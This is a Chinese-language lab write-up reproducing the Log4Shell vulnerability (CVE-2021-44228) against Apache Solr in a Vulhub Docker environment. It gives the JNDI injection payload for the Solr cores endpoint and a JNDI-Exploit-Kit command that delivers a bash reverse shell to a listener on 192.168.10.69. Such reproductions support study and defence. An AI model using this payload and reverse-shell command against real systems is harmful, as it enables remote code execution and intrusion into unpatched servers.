log4jshell CVE-2021-44228 复现

漏洞介绍

Log4j 是 Apache 提供的一个非常流行的 Java 日志框架。漏洞编号 CVE‑2021‑44228,就被称作 "Log4Shell",该漏洞存在于 Log4j 2 版本(从 2.0‑beta9 到 2.14.1)中,因为其日志处理机制中对 JNDI(Java 命名与目录接口)查找没有做限制或验证。攻击者只要向日志字段输入恶意 JNDI 字符串(例如 ${jndi:ldap://攻击者IP/对象}),Log4j 就会去远端服务器加载 Java 对象,从而导致 远程代码执行(RCE)

复现

通过Vulhub快速搭建环境

bash 复制代码
D:\vulhub\log4j\CVE-2021-44228
docker compose up -d

进入页面,发现Apache Solr

POST参数位置存在漏洞

bash 复制代码
/solr/admin/cores?action=${jndi:ldap://xxx}

RCE

我这里使用的java环境为java11

使用JNDI-Exploit-Kit进行利用

https://github.com/pimps/JNDI-Exploit-Kit

也可以使用ysoserial生成java反序列化载荷进行利用

https://github.com/pimps/ysoserial-modified

bash 复制代码
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C 'bash -i >& /dev/tcp/192.168.10.69/4444 0>&1' -L 192.168.10.69:1234

成功得到shell

相关推荐
独行soc2 天前
2025年渗透测试面试题总结-38(题目+回答)
android·安全·网络安全·面试·职场和发展·渗透测试·求职
leo__5203 天前
Logic Error: 如何识别和修复逻辑错误
log4j
Poppy .^0^4 天前
Maven 项目单元测试实战指南:从环境搭建到问题排查全解析
单元测试·log4j·maven
云雾J视界4 天前
技术债视角下的OKR:谷歌如何以敏捷迭代实现“分期付款”
log4j·谷歌·敏捷开发·okr·技术债
独行soc7 天前
2025年渗透测试面试题总结-29(题目+回答)
web安全·职场和发展·渗透测试·单元测试·压力测试
qingtian!7 天前
vulnhub-billu_b0x靶机渗透
网络安全·渗透测试
Jzhoucdc8 天前
CPTS-Agile (Werkzeug / Flask Debug)
渗透测试·cpts
杨杨杨大侠8 天前
第3篇:配置管理的艺术 - 让框架更灵活
java·spring·log4j